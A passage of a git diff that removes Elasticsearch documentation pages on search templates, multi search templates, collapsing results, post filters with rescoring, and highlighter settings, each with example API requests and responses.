_scripts/ -{ - "script": { - "lang": "mustache", - "source": { - "query": { - "match": { - "title": "{{query_string}}" - } - } - } - } -} ------------------------------------------- -// TEST[continued] - -////////////////////////// - -The API returns the following result if the template has been successfully -created: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- - -////////////////////////// - - -The template can be retrieved by calling - -[source,console] ------------------------------------------- -GET _scripts/ ------------------------------------------- -// TEST[continued] - -The API returns the following result: - -[source,console-result] ------------------------------------------- -{ - "script" : { - "lang" : "mustache", - "source" : """{"query":{"match":{"title":"{{query_string}}"}}}""", - "options": { - "content_type" : "application/json; charset=UTF-8" - } - }, - "_id": "", - "found": true -} ------------------------------------------- - - -This template can be deleted by calling - -[source,console] ------------------------------------------- -DELETE _scripts/ ------------------------------------------- -// TEST[continued] - - -[[use-registered-templates]] -===== Using a stored search template - -To use a stored template at search time send the following request: - -[source,console] ------------------------------------------- -GET _search/template -{ - "id": "", <1> - "params": { - "query_string": "search for these words" - } -} ------------------------------------------- -// TEST[catch:missing] -<1> Name of the stored template script. - - -[[_validating_templates]] -==== Validating a search template - -A template can be rendered in a response with given parameters by using the -following request: - -[source,console] ------------------------------------------- -GET _render/template -{ - "source": "{ \"query\": { \"terms\": {{#toJson}}statuses{{/toJson}} }}", - "params": { - "statuses" : { - "status": [ "pending", "published" ] - } - } -} ------------------------------------------- - - -The API returns the rendered template: - -[source,console-result] ------------------------------------------- -{ - "template_output": { - "query": { - "terms": { - "status": [ <1> - "pending", - "published" - ] - } - } - } -} ------------------------------------------- - -<1> `status` array has been populated with values from the `params` object. - - -Stored templates can also be rendered by calling the following request: - -[source,js] ------------------------------------------- -GET _render/template/ -{ - "params": { - "..." - } -} ------------------------------------------- -// NOTCONSOLE - -[[search-template-explain-parameter]] -===== Using the explain parameter - -You can use the `explain` parameter when running a template: - -[source,console] ------------------------------------------- -GET _search/template -{ - "id": "my_template", - "params": { - "status": [ "pending", "published" ] - }, - "explain": true -} ------------------------------------------- -// TEST[catch:missing] - - -[[search-template-profile-parameter]] -===== Profiling - -You can use the `profile` parameter when running a template: - -[source,console] ------------------------------------------- -GET _search/template -{ - "id": "my_template", - "params": { - "status": [ "pending", "published" ] - }, - "profile": true -} ------------------------------------------- -// TEST[catch:missing] - - -[[search-template-query-string-single]] -===== Filling in a query string with a single value - -[source,console] ------------------------------------------- -GET _search/template -{ - "source": { - "query": { - "term": { - "message": "{{query_string}}" - } - } - }, - "params": { - "query_string": "search for these words" - } -} ------------------------------------------- -// TEST[setup:my_index] - -[[search-template-converting-to-json]] -===== Converting parameters to JSON - -The `{{#toJson}}parameter{{/toJson}}` function can be used to convert parameters -like maps and array to their JSON representation: - -[source,console] ------------------------------------------- -GET _search/template -{ - "source": "{ \"query\": { \"terms\": {{#toJson}}statuses{{/toJson}} }}", - "params": { - "statuses" : { - "status": [ "pending", "published" ] - } - } -} ------------------------------------------- - -which is rendered as: - -[source,js] ------------------------------------------- -{ - "query": { - "terms": { - "status": [ - "pending", - "published" - ] - } - } -} ------------------------------------------- -// NOTCONSOLE - -A more complex example substitutes an array of JSON objects: - -[source,console] ------------------------------------------- -GET _search/template -{ - "source": "{\"query\":{\"bool\":{\"must\": {{#toJson}}clauses{{/toJson}} }}}", - "params": { - "clauses": [ - { "term": { "user" : "foo" } }, - { "term": { "user" : "bar" } } - ] - } -} ------------------------------------------- - -which is rendered as: - -[source,js] ------------------------------------------- -{ - "query": { - "bool": { - "must": [ - { - "term": { - "user": "foo" - } - }, - { - "term": { - "user": "bar" - } - } - ] - } - } -} ------------------------------------------- -// NOTCONSOLE - -[[search-template-concatenate-array]] -===== Concatenating array of values - -The `{{#join}}array{{/join}}` function can be used to concatenate the -values of an array as a comma delimited string: - -[source,console] ------------------------------------------- -GET _search/template -{ - "source": { - "query": { - "match": { - "emails": "{{#join}}emails{{/join}}" - } - } - }, - "params": { - "emails": [ "username@email.com", "lastname@email.com" ] - } -} ------------------------------------------- - -which is rendered as: - -[source,js] ------------------------------------------- -{ - "query" : { - "match" : { - "emails" : "username@email.com,lastname@email.com" - } - } -} ------------------------------------------- -// NOTCONSOLE - -The function also accepts a custom delimiter: - -[source,console] ------------------------------------------- -GET _search/template -{ - "source": { - "query": { - "range": { - "born": { - "gte" : "{{date.min}}", - "lte" : "{{date.max}}", - "format": "{{#join delimiter='||'}}date.formats{{/join delimiter='||'}}" - } - } - } - }, - "params": { - "date": { - "min": "2016", - "max": "31/12/2017", - "formats": ["dd/MM/yyyy", "yyyy"] - } - } -} ------------------------------------------- - -which is rendered as: - -[source,js] ------------------------------------------- -{ - "query": { - "range": { - "born": { - "gte": "2016", - "lte": "31/12/2017", - "format": "dd/MM/yyyy||yyyy" - } - } - } -} - ------------------------------------------- -// NOTCONSOLE - -[[search-template-default-values]] -===== Default values - -A default value is written as `{{var}}{{^var}}default{{/var}}` for instance: - -[source,js] ------------------------------------------- -{ - "source": { - "query": { - "range": { - "line_no": { - "gte": "{{start}}", - "lte": "{{end}}{{^end}}20{{/end}}" - } - } - } - }, - "params": { ... } -} ------------------------------------------- -// NOTCONSOLE - -When `params` is `{ "start": 10, "end": 15 }` this query would be rendered as: - -[source,js] ------------------------------------------- -{ - "range": { - "line_no": { - "gte": "10", - "lte": "15" - } - } -} ------------------------------------------- -// NOTCONSOLE - -But when `params` is `{ "start": 10 }` this query would use the default value -for `end`: - -[source,js] ------------------------------------------- -{ - "range": { - "line_no": { - "gte": "10", - "lte": "20" - } - } -} ------------------------------------------- -// NOTCONSOLE - -[[search-template-conditional-clauses]] -===== Conditional clauses - -Conditional clauses cannot be expressed using the JSON form of the template. -Instead, the template *must* be passed as a string. For instance, let's say -we wanted to run a `match` query on the `line` field, and optionally wanted -to filter by line numbers, where `start` and `end` are optional. - -The `params` would look like: - -[source,js] ------------------------------------------- -{ - "params": { - "text": "words to search for", - "line_no": { <1> - "start": 10, - "end": 20 - } - } -} ------------------------------------------- -// NOTCONSOLE -<1> The `line_no`, `start`, and `end` parameters are optional. - -When written as a query, the template would include invalid JSON, such as -section markers like `{{#line_no}}`: - -[source,js] ------------------------------------------- -{ - "query": { - "bool": { - "must": { - "match": { - "line": "{{text}}" <1> - } - }, - "filter": { - {{#line_no}} <2> - "range": { - "line_no": { - {{#start}} <3> - "gte": "{{start}}" <4> - {{#end}},{{/end}} <5> - {{/start}} - {{#end}} <6> - "lte": "{{end}}" <7> - {{/end}} - } - } - {{/line_no}} - } - } - } -} ------------------------------------------- -// NOTCONSOLE -<1> Fill in the value of param `text` -<2> Include the `range` filter only if `line_no` is specified -<3> Include the `gte` clause only if `line_no.start` is specified -<4> Fill in the value of param `line_no.start` -<5> Add a comma after the `gte` clause only if `line_no.start` - AND `line_no.end` are specified -<6> Include the `lte` clause only if `line_no.end` is specified -<7> Fill in the value of param `line_no.end` - -Because search templates cannot include invalid JSON, you can pass the same -query as a string instead: - -[source,js] --------------------- -"source": "{\"query\":{\"bool\":{\"must\":{\"match\":{\"line\":\"{{text}}\"}},\"filter\":{{{#line_no}}\"range\":{\"line_no\":{{{#start}}\"gte\":\"{{start}}\"{{#end}},{{/end}}{{/start}}{{#end}}\"lte\":\"{{end}}\"{{/end}}}}{{/line_no}}}}}}" --------------------- -// NOTCONSOLE - - -[[search-template-encode-urls]] -===== Encoding URLs - -The `{{#url}}value{{/url}}` function can be used to encode a string value -in a HTML encoding form as defined in by the -https://www.w3.org/TR/html4/[HTML specification]. - -As an example, it is useful to encode a URL: - -[source,console] ------------------------------------------- -GET _render/template -{ - "source": { - "query": { - "term": { - "http_access_log": "{{#url}}{{host}}/{{page}}{{/url}}" - } - } - }, - "params": { - "host": "https://www.elastic.co/", - "page": "learn" - } -} ------------------------------------------- - - -The previous query will be rendered as: - -[source,console-result] ------------------------------------------- -{ - "template_output": { - "query": { - "term": { - "http_access_log": "https%3A%2F%2Fwww.elastic.co%2F%2Flearn" - } - } - } -} ------------------------------------------- - - -[[multi-search-template]] -=== Multi Search Template - -Allows to execute several search template requests. - -[[multi-search-template-api-request]] -==== {api-request-title} - -`GET _msearch/template` - - -[[multi-search-template-api-desc]] -==== {api-description-title} - -Allows to execute several search template requests within the same API using the -`_msearch/template` endpoint. - -The format of the request is similar to the <> format: - -[source,js] --------------------------------------------------- -header\n -body\n -header\n -body\n --------------------------------------------------- -// NOTCONSOLE - -The header part supports the same `index`, `search_type`, `preference`, and -`routing` options as the Multi Search API. - -The body includes a search template body request and supports inline, stored and -file templates. - - -[[multi-search-template-api-example]] -==== {api-examples-title} - -[source,js] --------------------------------------------------- -$ cat requests -{"index": "test"} -{"source": {"query": {"match": {"user" : "{{username}}" }}}, "params": {"username": "john"}} <1> -{"source": {"query": {"{{query_type}}": {"name": "{{name}}" }}}, "params": {"query_type": "match_phrase_prefix", "name": "Smith"}} -{"index": "_all"} -{"id": "template_1", "params": {"query_string": "search for these words" }} <2> - -$ curl -H "Content-Type: application/x-ndjson" -XGET localhost:9200/_msearch/template --data-binary "@requests"; echo --------------------------------------------------- -// NOTCONSOLE -// Not converting to console because this shows how curl works -<1> Inline search template request - -<2> Search template request based on a stored template - -The response returns a `responses` array, which includes the search template -response for each search template request matching its order in the original -multi search template request. If there was a complete failure for that specific -search template request, an object with `error` message will be returned in -place of the actual search response. diff --git a/docs/reference/search/search-your-data/collapse-search-results.asciidoc b/docs/reference/search/search-your-data/collapse-search-results.asciidoc deleted file mode 100644 index e4f8c8b100e..00000000000 --- a/docs/reference/search/search-your-data/collapse-search-results.asciidoc +++ /dev/null @@ -1,226 +0,0 @@ -[[collapse-search-results]] -== Collapse search results - -You can use the `collapse` parameter to collapse search results based -on field values. The collapsing is done by selecting only the top sorted -document per collapse key. - -For example, the following search collapses results by `user.id` and sorts them -by `http.response.bytes`. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "query": { - "match": { - "message": "GET /search" - } - }, - "collapse": { - "field": "user.id" <1> - }, - "sort": [ "http.response.bytes" ], <2> - "from": 10 <3> -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> Collapse the result set using the "user.id" field -<2> Sort the results by `http.response.bytes` -<3> define the offset of the first collapsed result - -WARNING: The total number of hits in the response indicates the number of matching documents without collapsing. -The total number of distinct group is unknown. - -The field used for collapsing must be a single valued <> or <> field with <> activated - -NOTE: The collapsing is applied to the top hits only and does not affect aggregations. - -[discrete] -[[expand-collapse-results]] -=== Expand collapse results - -It is also possible to expand each collapsed top hits with the `inner_hits` option. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "query": { - "match": { - "message": "GET /search" - } - }, - "collapse": { - "field": "user.id", <1> - "inner_hits": { - "name": "most_recent", <2> - "size": 5, <3> - "sort": [ { "@timestamp": "asc" } ] <4> - }, - "max_concurrent_group_searches": 4 <5> - }, - "sort": [ "http.response.bytes" ] -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> collapse the result set using the "user.id" field -<2> the name used for the inner hit section in the response -<3> the number of inner_hits to retrieve per collapse key -<4> how to sort the document inside each group -<5> the number of concurrent requests allowed to retrieve the `inner_hits` per group - -See <> for the complete list of supported options and the format of the response. - -It is also possible to request multiple `inner_hits` for each collapsed hit. This can be useful when you want to get -multiple representations of the collapsed hits. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "query": { - "match": { - "message": "GET /search" - } - }, - "collapse": { - "field": "user.id", <1> - "inner_hits": [ - { - "name": "largest_responses", <2> - "size": 3, - "sort": [ "http.response.bytes" ] - }, - { - "name": "most_recent", <3> - "size": 3, - "sort": [ { "@timestamp": "asc" } ] - } - ] - }, - "sort": [ "http.response.bytes" ] -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> collapse the result set using the "user.id" field -<2> return the three largest HTTP responses for the user -<3> return the three most recent HTTP responses for the user - -The expansion of the group is done by sending an additional query for each -`inner_hit` request for each collapsed hit returned in the response. This can significantly slow things down -if you have too many groups and/or `inner_hit` requests. - -The `max_concurrent_group_searches` request parameter can be used to control -the maximum number of concurrent searches allowed in this phase. -The default is based on the number of data nodes and the default search thread pool size. - -WARNING: `collapse` cannot be used in conjunction with <>, -<> or <>. - -[discrete] -[[second-level-of-collapsing]] -=== Second level of collapsing - -Second level of collapsing is also supported and is applied to `inner_hits`. - -For example, the following search collapses results by `geo.country_name`. -Within each `geo.country_name`, inner hits are collapsed by `user.id`. - -[source,js] --------------------------------------------------- -GET /my-index-000001/_search -{ - "query": { - "match": { - "message": "GET /search" - } - }, - "collapse": { - "field": "geo.country_name", - "inner_hits": { - "name": "by_location", - "collapse": { "field": "user.id" }, - "size": 3 - } - } -} --------------------------------------------------- -// NOTCONSOLE - - -Response: -[source,js] --------------------------------------------------- -{ - ... - "hits": [ - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "9", - "_score": ..., - "_source": {...}, - "fields": { "geo": { "country_name": [ "UK" ] }}, - "inner_hits": { - "by_location": { - "hits": { - ..., - "hits": [ - { - ... - "fields": { "user": "id": { [ "user124" ] }} - }, - { - ... - "fields": { "user": "id": { [ "user589" ] }} - }, - { - ... - "fields": { "user": "id": { [ "user001" ] }} - } - ] - } - } - } - }, - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_score": .., - "_source": {... - }, - "fields": { "geo": { "country_name": [ "Canada" ] }}, - "inner_hits": { - "by_location": { - "hits": { - ..., - "hits": [ - { - ... - "fields": { "user": "id": { [ "user444" ] }} - }, - { - ... - "fields": { "user": "id": { [ "user1111" ] } - }, - { - ... - "fields": { "user": "id": { [ "user999" ] }} - } - ] - } - } - } - }, - ... - ] -} --------------------------------------------------- -// NOTCONSOLE - -NOTE: Second level of collapsing doesn't allow `inner_hits`. \ No newline at end of file diff --git a/docs/reference/search/search-your-data/filter-search-results.asciidoc b/docs/reference/search/search-your-data/filter-search-results.asciidoc deleted file mode 100644 index 2704f1d1141..00000000000 --- a/docs/reference/search/search-your-data/filter-search-results.asciidoc +++ /dev/null @@ -1,291 +0,0 @@ -[[filter-search-results]] -== Filter search results - -You can use two methods to filter search results: - -* Use a boolean query with a `filter` clause. Search requests apply -<> to both search hits and -<>. - -* Use the search API's `post_filter` parameter. Search requests apply -<> only to search hits, not aggregations. You can use -a post filter to calculate aggregations based on a broader result set, and then -further narrow the results. -+ -You can also <> hits after the post filter to -improve relevance and reorder results. - -[discrete] -[[post-filter]] -=== Post filter - -When you use the `post_filter` parameter to filter search results, the search -hits are filtered after the aggregations are calculated. A post filter has no -impact on the aggregation results. - -For example, you are selling shirts that have the following properties: - -[source,console] --------------------------------------------------- -PUT /shirts -{ - "mappings": { - "properties": { - "brand": { "type": "keyword"}, - "color": { "type": "keyword"}, - "model": { "type": "keyword"} - } - } -} - -PUT /shirts/_doc/1?refresh -{ - "brand": "gucci", - "color": "red", - "model": "slim" -} --------------------------------------------------- -// TESTSETUP - - -Imagine a user has specified two filters: - -`color:red` and `brand:gucci`. You only want to show them red shirts made by -Gucci in the search results. Normally you would do this with a -<>: - -[source,console] --------------------------------------------------- -GET /shirts/_search -{ - "query": { - "bool": { - "filter": [ - { "term": { "color": "red" }}, - { "term": { "brand": "gucci" }} - ] - } - } -} --------------------------------------------------- - -However, you would also like to use _faceted navigation_ to display a list of -other options that the user could click on. Perhaps you have a `model` field -that would allow the user to limit their search results to red Gucci -`t-shirts` or `dress-shirts`. - -This can be done with a -<>: - -[source,console] --------------------------------------------------- -GET /shirts/_search -{ - "query": { - "bool": { - "filter": [ - { "term": { "color": "red" }}, - { "term": { "brand": "gucci" }} - ] - } - }, - "aggs": { - "models": { - "terms": { "field": "model" } <1> - } - } -} --------------------------------------------------- - -<1> Returns the most popular models of red shirts by Gucci. - -But perhaps you would also like to tell the user how many Gucci shirts are -available in *other colors*. If you just add a `terms` aggregation on the -`color` field, you will only get back the color `red`, because your query -returns only red shirts by Gucci. - -Instead, you want to include shirts of all colors during aggregation, then -apply the `colors` filter only to the search results. This is the purpose of -the `post_filter`: - -[source,console] --------------------------------------------------- -GET /shirts/_search -{ - "query": { - "bool": { - "filter": { - "term": { "brand": "gucci" } <1> - } - } - }, - "aggs": { - "colors": { - "terms": { "field": "color" } <2> - }, - "color_red": { - "filter": { - "term": { "color": "red" } <3> - }, - "aggs": { - "models": { - "terms": { "field": "model" } <3> - } - } - } - }, - "post_filter": { <4> - "term": { "color": "red" } - } -} --------------------------------------------------- - -<1> The main query now finds all shirts by Gucci, regardless of color. -<2> The `colors` agg returns popular colors for shirts by Gucci. -<3> The `color_red` agg limits the `models` sub-aggregation - to *red* Gucci shirts. -<4> Finally, the `post_filter` removes colors other than red - from the search `hits`. - -[discrete] -[[rescore]] -=== Rescore filtered search results - -Rescoring can help to improve precision by reordering just the top (eg -100 - 500) documents returned by the -<> and -<> phases, using a -secondary (usually more costly) algorithm, instead of applying the -costly algorithm to all documents in the index. - -A `rescore` request is executed on each shard before it returns its -results to be sorted by the node handling the overall search request. - -Currently the rescore API has only one implementation: the query -rescorer, which uses a query to tweak the scoring. In the future, -alternative rescorers may be made available, for example, a pair-wise rescorer. - -NOTE: An error will be thrown if an explicit <> -(other than `_score` in descending order) is provided with a `rescore` query. - -NOTE: when exposing pagination to your users, you should not change -`window_size` as you step through each page (by passing different -`from` values) since that can alter the top hits causing results to -confusingly shift as the user steps through pages. - -[discrete] -[[query-rescorer]] -==== Query rescorer - -The query rescorer executes a second query only on the Top-K results -returned by the <> and -<> phases. The -number of docs which will be examined on each shard can be controlled by -the `window_size` parameter, which defaults to 10. - -By default the scores from the original query and the rescore query are -combined linearly to produce the final `_score` for each document. The -relative importance of the original query and of the rescore query can -be controlled with the `query_weight` and `rescore_query_weight` -respectively. Both default to `1`. - -For example: - -[source,console] --------------------------------------------------- -POST /_search -{ - "query" : { - "match" : { - "message" : { - "operator" : "or", - "query" : "the quick brown" - } - } - }, - "rescore" : { - "window_size" : 50, - "query" : { - "rescore_query" : { - "match_phrase" : { - "message" : { - "query" : "the quick brown", - "slop" : 2 - } - } - }, - "query_weight" : 0.7, - "rescore_query_weight" : 1.2 - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -The way the scores are combined can be controlled with the `score_mode`: -[cols="<,<",options="header",] -|======================================================================= -|Score Mode |Description -|`total` |Add the original score and the rescore query score. The default. -|`multiply` |Multiply the original score by the rescore query score. Useful -for <> rescores. -|`avg` |Average the original score and the rescore query score. -|`max` |Take the max of original score and the rescore query score. -|`min` |Take the min of the original score and the rescore query score. -|======================================================================= - -[discrete] -[[multiple-rescores]] -==== Multiple rescores - -It is also possible to execute multiple rescores in sequence: - -[source,console] --------------------------------------------------- -POST /_search -{ - "query" : { - "match" : { - "message" : { - "operator" : "or", - "query" : "the quick brown" - } - } - }, - "rescore" : [ { - "window_size" : 100, - "query" : { - "rescore_query" : { - "match_phrase" : { - "message" : { - "query" : "the quick brown", - "slop" : 2 - } - } - }, - "query_weight" : 0.7, - "rescore_query_weight" : 1.2 - } - }, { - "window_size" : 10, - "query" : { - "score_mode": "multiply", - "rescore_query" : { - "function_score" : { - "script_score": { - "script": { - "source": "Math.log10(doc.count.value + 2)" - } - } - } - } - } - } ] -} --------------------------------------------------- -// TEST[setup:my_index] - -The first one gets the results of the query then the second one gets the -results of the first, etc. The second rescore will "see" the sorting done -by the first rescore so it is possible to use a large window on the first -rescore to pull documents into a smaller window for the second rescore. diff --git a/docs/reference/search/search-your-data/highlighting.asciidoc b/docs/reference/search/search-your-data/highlighting.asciidoc deleted file mode 100644 index 97e471ea474..00000000000 --- a/docs/reference/search/search-your-data/highlighting.asciidoc +++ /dev/null @@ -1,1124 +0,0 @@ -[[highlighting]] -== Highlighting - -Highlighters enable you to get highlighted snippets from one or more fields -in your search results so you can show users where the query matches are. -When you request highlights, the response contains an additional `highlight` -element for each search hit that includes the highlighted fields and the -highlighted fragments. - -NOTE: Highlighters don't reflect the boolean logic of a query when extracting - terms to highlight. Thus, for some complex boolean queries (e.g nested boolean - queries, queries using `minimum_should_match` etc.), parts of documents may be - highlighted that don't correspond to query matches. - -Highlighting requires the actual content of a field. If the field is not -stored (the mapping does not set `store` to `true`), the actual `_source` is -loaded and the relevant field is extracted from `_source`. - -For example, to get highlights for the `content` field in each search hit -using the default highlighter, include a `highlight` object in -the request body that specifies the `content` field: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { "content": "kimchy" } - }, - "highlight": { - "fields": { - "content": {} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -{es} supports three highlighters: `unified`, `plain`, and `fvh` (fast vector -highlighter). You can specify the highlighter `type` you want to use -for each field. - -[discrete] -[[unified-highlighter]] -=== Unified highlighter -The `unified` highlighter uses the Lucene Unified Highlighter. This -highlighter breaks the text into sentences and uses the BM25 algorithm to score -individual sentences as if they were documents in the corpus. It also supports -accurate phrase and multi-term (fuzzy, prefix, regex) highlighting. This is the -default highlighter. - -[discrete] -[[plain-highlighter]] -=== Plain highlighter -The `plain` highlighter uses the standard Lucene highlighter. It attempts to -reflect the query matching logic in terms of understanding word importance and -any word positioning criteria in phrase queries. - -[WARNING] -The `plain` highlighter works best for highlighting simple query matches in a -single field. To accurately reflect query logic, it creates a tiny in-memory -index and re-runs the original query criteria through Lucene's query execution -planner to get access to low-level match information for the current document. -This is repeated for every field and every document that needs to be highlighted. -If you want to highlight a lot of fields in a lot of documents with complex -queries, we recommend using the `unified` highlighter on `postings` or `term_vector` fields. - -[discrete] -[[fast-vector-highlighter]] -=== Fast vector highlighter -The `fvh` highlighter uses the Lucene Fast Vector highlighter. -This highlighter can be used on fields with `term_vector` set to -`with_positions_offsets` in the mapping. The fast vector highlighter: - -* Can be customized with a <>. -* Requires setting `term_vector` to `with_positions_offsets` which - increases the size of the index -* Can combine matches from multiple fields into one result. See - `matched_fields` -* Can assign different weights to matches at different positions allowing - for things like phrase matches being sorted above term matches when - highlighting a Boosting Query that boosts phrase matches over term matches - -[WARNING] -The `fvh` highlighter does not support span queries. If you need support for -span queries, try an alternative highlighter, such as the `unified` highlighter. - -[discrete] -[[offsets-strategy]] -=== Offsets strategy -To create meaningful search snippets from the terms being queried, -the highlighter needs to know the start and end character offsets of each word -in the original text. These offsets can be obtained from: - -* The postings list. If `index_options` is set to `offsets` in the mapping, -the `unified` highlighter uses this information to highlight documents without -re-analyzing the text. It re-runs the original query directly on the postings -and extracts the matching offsets from the index, limiting the collection to -the highlighted documents. This is important if you have large fields because -it doesn't require reanalyzing the text to be highlighted. It also requires less -disk space than using `term_vectors`. - -* Term vectors. If `term_vector` information is provided by setting -`term_vector` to `with_positions_offsets` in the mapping, the `unified` -highlighter automatically uses the `term_vector` to highlight the field. -It's fast especially for large fields (> `1MB`) and for highlighting multi-term queries like -`prefix` or `wildcard` because it can access the dictionary of terms for each document. -The `fvh` highlighter always uses term vectors. - -* Plain highlighting. This mode is used by the `unified` when there is no other alternative. -It creates a tiny in-memory index and re-runs the original query criteria through -Lucene's query execution planner to get access to low-level match information on -the current document. This is repeated for every field and every document that -needs highlighting. The `plain` highlighter always uses plain highlighting. - -[WARNING] -Plain highlighting for large texts may require substantial amount of time and memory. -To protect against this, the maximum number of text characters that will be analyzed has been -limited to 1000000. This default limit can be changed -for a particular index with the index setting `index.highlight.max_analyzed_offset`. - -[discrete] -[[highlighting-settings]] -=== Highlighting settings - -Highlighting settings can be set on a global level and overridden at -the field level. - -boundary_chars:: A string that contains each boundary character. -Defaults to `.,!? \t\n`. - -boundary_max_scan:: How far to scan for boundary characters. Defaults to `20`. - -[[boundary-scanners]] -boundary_scanner:: Specifies how to break the highlighted fragments: `chars`, -`sentence`, or `word`. Only valid for the `unified` and `fvh` highlighters. -Defaults to `sentence` for the `unified` highlighter. Defaults to `chars` for -the `fvh` highlighter. -`chars`::: Use the characters specified by `boundary_chars` as highlighting -boundaries. The `boundary_max_scan` setting controls how far to scan for -boundary characters. Only valid for the `fvh` highlighter. -`sentence`::: Break highlighted fragments at the next sentence boundary, as -determined by Java's -https://docs.oracle.com/javase/8/docs/api/java/text/BreakIterator.html[BreakIterator]. -You can specify the locale to use with `boundary_scanner_locale`. -+ -NOTE: When used with the `unified` highlighter, the `sentence` scanner splits -sentences bigger than `fragment_size` at the first word boundary next to -`fragment_size`. You can set `fragment_size` to 0 to never split any sentence. - -`word`::: Break highlighted fragments at the next word boundary, as determined -by Java's https://docs.oracle.com/javase/8/docs/api/java/text/BreakIterator.html[BreakIterator]. -You can specify the locale to use with `boundary_scanner_locale`. - -boundary_scanner_locale:: Controls which locale is used to search for sentence -and word boundaries. This parameter takes a form of a language tag, -e.g. `"en-US"`, `"fr-FR"`, `"ja-JP"`. More info can be found in the -https://docs.oracle.com/javase/8/docs/api/java/util/Locale.html#forLanguageTag-java.lang.String-[Locale Language Tag] -documentation. The default value is https://docs.oracle.com/javase/8/docs/api/java/util/Locale.html#ROOT[ Locale.ROOT]. - -encoder:: Indicates if the snippet should be HTML encoded: -`default` (no encoding) or `html` (HTML-escape the snippet text and then -insert the highlighting tags) - -fields:: Specifies the fields to retrieve highlights for. You can use wildcards -to specify fields. For example, you could specify `comment_*` to -get highlights for all <> and <> fields -that start with `comment_`. -+ -NOTE: Only text and keyword fields are highlighted when you use wildcards. -If you use a custom mapper and want to highlight on a field anyway, you -must explicitly specify that field name. - -force_source:: Highlight based on the source even if the field is -stored separately. Defaults to `false`. - -fragmenter:: Specifies how text should be broken up in highlight -snippets: `simple` or `span`. Only valid for the `plain` highlighter. -Defaults to `span`. - -`simple`::: Breaks up text into same-sized fragments. -`span`::: Breaks up text into same-sized fragments, but tries to avoid -breaking up text between highlighted terms. This is helpful when you're -querying for phrases. Default. - -fragment_offset:: Controls the margin from which you want to start -highlighting. Only valid when using the `fvh` highlighter. - -fragment_size:: The size of the highlighted fragment in characters. Defaults -to 100. - -highlight_query:: Highlight matches for a query other than the search -query. This is especially useful if you use a rescore query because -those are not taken into account by highlighting by default. -+ -IMPORTANT: {es} does not validate that `highlight_query` contains -the search query in any way so it is possible to define it so -legitimate query results are not highlighted. Generally, you should -include the search query as part of the `highlight_query`. - -matched_fields:: Combine matches on multiple fields to highlight a single field. -This is most intuitive for multifields that analyze the same string in different -ways. All `matched_fields` must have `term_vector` set to -`with_positions_offsets`, but only the field to which -the matches are combined is loaded so only that field benefits from having -`store` set to `yes`. Only valid for the `fvh` highlighter. - -no_match_size:: The amount of text you want to return from the beginning -of the field if there are no matching fragments to highlight. Defaults -to 0 (nothing is returned). - -number_of_fragments:: The maximum number of fragments to return. If the -number of fragments is set to 0, no fragments are returned. Instead, -the entire field contents are highlighted and returned. This can be -handy when you need to highlight short texts such as a title or -address, but fragmentation is not required. If `number_of_fragments` -is 0, `fragment_size` is ignored. Defaults to 5. - -order:: Sorts highlighted fragments by score when set to `score`. By default, -fragments will be output in the order they appear in the field (order: `none`). -Setting this option to `score` will output the most relevant fragments first. -Each highlighter applies its own logic to compute relevancy scores. See -the document <> -for more details how different highlighters find the best fragments. - -phrase_limit:: Controls the number of matching phrases in a document that are -considered. Prevents the `fvh` highlighter from analyzing too many phrases -and consuming too much memory. When using `matched_fields`, `phrase_limit` -phrases per matched field are considered. Raising the limit increases query -time and consumes more memory. Only supported by the `fvh` highlighter. -Defaults to 256. - -pre_tags:: Use in conjunction with `post_tags` to define the HTML tags -to use for the highlighted text. By default, highlighted text is wrapped -in `` and `` tags. Specify as an array of strings. - -post_tags:: Use in conjunction with `pre_tags` to define the HTML tags -to use for the highlighted text. By default, highlighted text is wrapped -in `` and `` tags. Specify as an array of strings. - -require_field_match:: By default, only fields that contains a query match are -highlighted. Set `require_field_match` to `false` to highlight all fields. -Defaults to `true`. - -tags_schema:: Set to `styled` to use the built-in tag schema. The `styled` -schema defines the following `pre_tags` and defines `post_tags` as -``. -+ -[source,html] --------------------------------------------------- -, , , -, , , -, , , - --------------------------------------------------- - -[[highlighter-type]] -type:: The highlighter to use: `unified`, `plain`, or `fvh`. Defaults to -`unified`. - -[discrete] -[[highlighting-examples]] -=== Highlighting examples - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[[override-global-settings]] -[discrete] -== Override global settings - -You can specify highlighter settings globally and selectively override them for -individual fields. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "number_of_fragments" : 3, - "fragment_size" : 150, - "fields" : { - "body" : { "pre_tags" : [""], "post_tags" : [""] }, - "blog.title" : { "number_of_fragments" : 0 }, - "blog.author" : { "number_of_fragments" : 0 }, - "blog.comment" : { "number_of_fragments" : 5, "order" : "score" } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[specify-highlight-query]] -== Specify a highlight query - -You can specify a `highlight_query` to take additional information into account -when highlighting. For example, the following query includes both the search -query and rescore query in the `highlight_query`. Without the `highlight_query`, -highlighting would only take the search query into account. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "comment": { - "query": "foo bar" - } - } - }, - "rescore": { - "window_size": 50, - "query": { - "rescore_query": { - "match_phrase": { - "comment": { - "query": "foo bar", - "slop": 1 - } - } - }, - "rescore_query_weight": 10 - } - }, - "_source": false, - "highlight": { - "order": "score", - "fields": { - "comment": { - "fragment_size": 150, - "number_of_fragments": 3, - "highlight_query": { - "bool": { - "must": { - "match": { - "comment": { - "query": "foo bar" - } - } - }, - "should": { - "match_phrase": { - "comment": { - "query": "foo bar", - "slop": 1, - "boost": 10.0 - } - } - }, - "minimum_should_match": 0 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[set-highlighter-type]] -== Set highlighter type - -The `type` field allows to force a specific highlighter type. -The allowed values are: `unified`, `plain` and `fvh`. -The following is an example that forces the use of the plain highlighter: - 